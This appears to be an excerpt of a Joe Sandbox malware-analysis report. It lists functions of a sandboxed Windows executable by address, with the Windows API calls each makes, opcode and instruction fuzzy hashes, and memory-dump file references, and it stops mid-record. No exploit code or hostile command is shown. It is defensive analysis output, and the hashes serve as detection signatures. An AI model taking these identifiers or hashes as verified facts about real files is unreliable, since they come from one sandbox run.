Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2359106489-0
Opcode ID: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
Instruction ID: aeebf426e120d9567595e9391a093ae1dc5286d25d9934a36e7152e1820d6224
Opcode Fuzzy Hash: b1db56c0457af69a1529a8ecbfe86314167c05b0bf6f6c19be2aba948e3cdc26
Instruction Fuzzy Hash: 87318422A1C74283EB20AF65B44417DE251FB88FB4F954331EE5D82795DF2CF6418791

Function 00007FF7C01A653C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7C01A654B

Part of subcall function 00007FF7C01A5FC4: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7C01A5FE6

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7C01A6560
__scrt_release_startup_lock.LIBCMT ref: 00007FF7C01A65CE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7C01A6621

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
Instruction ID: b3cea9cb0245ec9b44ddf5e004ab3af51b17febd21bfd39a6811edb3edc58bd6
Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
Instruction Fuzzy Hash: E5312921E0820387FA25BF65B4552BDE2859F41BA4FC44434EA4ECB3D7DF2CB92586B1

Function 00007FF7C0184520 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7C0184548
ReadFile.KERNELBASE ref: 00007FF7C0184567
GetLastError.KERNEL32 ref: 00007FF7C018459B
GetLastError.KERNEL32 ref: 00007FF7C01845BA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
Instruction ID: 4cad5f85c07ae26f52294e92e842ba947aa001b851cf5e88230a9314de75e5c4
Opcode Fuzzy Hash: 81b122369233d7b8f515bb11307ece11792f2ae8c3e4e6e271921b1ee2b41d44
Instruction Fuzzy Hash: 08215621A0C64183EA60BF12B44023EE7A0EF45FB4F954731EA5D86784DF6CFA5587A2

Function 00007FF7C019D0A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C018DC4C: GetSystemDirectoryW.KERNEL32 ref: 00007FF7C018DCA3

OleInitialize.OLE32 ref: 00007FF7C019D0C2
SHGetMalloc.SHELL32 ref: 00007FF7C019D110

Strings

riched20.dll, xrefs: 00007FF7C019D0B1

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
Instruction ID: 661b78868cfe610236ad058f315db3330e3efa4a156d4af09a4434765909527a
Opcode Fuzzy Hash: 30ed311a49e238ceea73ca57b68d7366abba04754796603139c7fee8065bdde5
Instruction Fuzzy Hash: F8F0F471618B4583DB50EF60F4581AEF3A0FB84B64F844135E99D82B55DF7CE158CB50

Function 00007FF7C019DAC4 Relevance: 4.6, APIs: 3, Instructions: 146COMMON

Download Yara Rule

APIs

SHFileOperationW.SHELL32 ref: 00007FF7C019DC90
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019DCFC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019DD02

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileOperation
String ID:
API String ID: 2032784890-0
Opcode ID: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
Instruction ID: 1af6b2ecef1a55443135b52246cee31ed9d0a4d0c58017cf233fd78704b98739
Opcode Fuzzy Hash: 7795e1decf5c61fb28cbe9873a1872282343af9adeb0f6444034ac41d94e344c
Instruction Fuzzy Hash: FA61C372B14B41CAEB00EF60E4542ECB3A1EB45BA8F814635DA1D93B99DF38F155C390

Function 00007FF7C0184334 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7C01843CF
CreateFileW.KERNEL32 ref: 00007FF7C018443C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01844D8

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CreateFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2272807158-0
Opcode ID: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
Instruction ID: f140d1f0581db72cb36ac0de4f87b2f6882186b2466eedd8c396595690a58a1b
Opcode Fuzzy Hash: 6b8eb8b94387b8485b01743e86d2fb3528bffe900f4db4cb81d7376aef299a7b
Instruction Fuzzy Hash: 51419B62A1878583EB10AF16F44426DE3A1FB84BB4F900335DEAD42BD5CF3CE5A08791

Function 00007FF7C0181FF8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32 ref: 00007FF7C018203E
GetWindowTextW.USER32 ref: 00007FF7C0182076
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0182105

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2176759853-0
Opcode ID: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
Instruction ID: 7cc6784e31b0435712108cadd03048dba4bf1ce33bd7223bc013447ff0180fe7
Opcode Fuzzy Hash: 29206f03e8ea25254ece3d2a72832fd1ea84fd53fe3ace23c817ee81615a60be
Instruction Fuzzy Hash: A4218162629B8582EA109F65B44016EE364FB89FE0F945335EF9C43B95DF3CE190C780

Function 00007FF7C0185FF4 Relevance: 4.6, APIs: 3, Instructions: 62COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,00000001,?,00007FF7C018FF75), ref: 00007FF7C018601E
SetFileAttributesW.KERNEL32 ref: 00007FF7C0186070
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01860DA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
Instruction ID: 78c7c669ef114f03b8078147b6eef63ed73e676dc22490eb92b9fcdba8ebddfb
Opcode Fuzzy Hash: b265933569970aa9f88eee972e8007fd8b91439cfa1828cb055f1fca20ce9a43
Instruction Fuzzy Hash: 8A21D822A1C78182EA20AF14F44426EE361FF88FB4F945330FE9D82795DF2CE6408795

Function 00007FF7C0185790 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7C018FFB6), ref: 00007FF7C01857BB
DeleteFileW.KERNEL32 ref: 00007FF7C018580B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0185875

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3118131910-0
Opcode ID: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
Instruction ID: 18ded456ff567cb04ec5f2f1a054105b1d6a5d4b1e04bcba09de512b7ca769df
Opcode Fuzzy Hash: df95a73e4d643e9604293c38faa31d47468479eac191cd886206386da3b21c8e
Instruction Fuzzy Hash: 9521A962A1878183EB10AF25F44412EE360FB85FE4F901335FA9D86B99DF2CE6418790

Function 00007FF7C0185890 Relevance: 4.6, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7C0185885,?,?,?,?,00007FF7C0190062), ref: 00007FF7C01858BB
GetFileAttributesW.KERNELBASE ref: 00007FF7C0185908
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018596D

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1203560049-0
Opcode ID: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
Instruction ID: 770379446bc2bedbd5e9b96b5ad06b9b67995eeae8aa55e4caf336f6fdd6450a
Opcode Fuzzy Hash: ef92913312bb73a90d90e731208bb6c0704bd2d73e0e832659789265a95f0d3b
Instruction Fuzzy Hash: CA214972A1878583EA10AF19F48412DE361FB88FB8F900331EA9D87B95DF7CE6418751

Function 00007FF7C01AF444 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7C01AF428), ref: 00007FF7C01AF46C
TerminateProcess.KERNEL32(?,?,?,00007FF7C01AF428), ref: 00007FF7C01AF477
ExitProcess.KERNEL32 ref: 00007FF7C01AF486

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
Instruction ID: 77d03abaf31135e1b2dcae9c6de33f3d3b9edf2f04a63236316addb36da90a96
Opcode Fuzzy Hash: 0d5958cce1ab38587c529cfbb209ba956894e29a38315a5b4669c830f79dc8c5
Instruction Fuzzy Hash: A6E0E560B0460683EA047FA5B891A7EE262AF88B61F404438CC4A82396CF7DB45886B0

Function 00007FF7C01922E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0192323

Strings

vector too long, xrefs: 00007FF7C0192254

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: vector too long
API String ID: 3668304517-2873823879
Opcode ID: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
Instruction ID: fc697e7ff6c24500d22f1a9eb7e6850214ba6ea72a69e2a15ff813066e0c6214
Opcode Fuzzy Hash: a7343eee3c490a039372984b75849d01cabdd3500f915569194afc0abc0bdd4f
Instruction Fuzzy Hash: F4619072A1878187E700AF60E8401ADF7F1FB85B64F945235EA9987B95DF38E490C790

Function 00007FF7C0196D28 Relevance: 3.2, APIs: 2, Instructions: 170COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0196FBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0196FC5

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
Instruction ID: 6d3c8a622e403ffb0675651c22151f9b20c2b788aa564124768b4d173525b0bc
Opcode Fuzzy Hash: 456ef8ad5fd7c51842a77fc0017af3233e47992e66e1eb3dc404b7829346f65c
Instruction Fuzzy Hash: 72717D62B18A5187FA00EF64F4541ACE3AAAB44FB4B900231DA2D877D9DF38F451C3A0

Function 00007FF7C018491C Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,?), ref: 00007FF7C0184A4D
GetLastError.KERNEL32(?,?), ref: 00007FF7C0184A5C

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
Instruction ID: da6cb66099bfaffce0befa13cd36b8ea3174e177ca0a82d250807da1daa6e79f
Opcode Fuzzy Hash: afbb24ce4a808c86d9ab97423e5b5b7dbeb16d4b7f73d0bc2ed342d630b90402
Instruction Fuzzy Hash: C331B222A1969583EE706E1AE54067DE350AF08FF8F950231DE1D87B94DF2CF64187A1

Function 00007FF7C01947F0 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0194931
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0194937

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
Instruction ID: 9667cdc0b11935f738163c7628ac33389742391c05752258e83ba38fcfd4c650
Opcode Fuzzy Hash: 78dcec84b2b2081ffdb456cee5bc94528ec2c7f435e71baf867d0267fc902a63
Instruction Fuzzy Hash: 3B41B462F14B858BFB00AF69F4412ACF362EB44BB8F805235DE5C52BD9DF78A1508394

Function 00007FF7C0181EBC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7C0181EF1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0181FF0

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
Instruction ID: 12a8882598ac2226b828e08c951099f2fb57f00e3f0ba403a485896a1682843c
Opcode Fuzzy Hash: a9e66eae6c10b7998c2c5de9bd97b12879dcbec8aef09866538b836a72d0f55b
Instruction Fuzzy Hash: E1319C62A1874182EA20AF15F4443ADF3A5AB84FB0F844235EB9C46B95DF7CF6548790

Function 00007FF7C0184C70 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF7C0184C9E
SetFileTime.KERNELBASE ref: 00007FF7C0184D3B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
Instruction ID: 965450b4849cceeb02daa1fb780a8661e2411c0427a58460b0c7cf60242c406f
Opcode Fuzzy Hash: 14d6942ec359b5a95a3eda4e56e7a82c4a9158dc0f228e60d57ace847166d981
Instruction Fuzzy Hash: 6D21F662A0A64253EA61AF12F00137EE7D4AF01FA4F864230DE4C46391EF3CF646C392

Function 00007FF7C018AEE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF7C018AF67
LoadStringW.USER32 ref: 00007FF7C018AF80

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
Instruction ID: 5829fc700a73a8b25f38eb18c8e3ccea6c42840098cdec2a4593a3d7dde8798f
Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
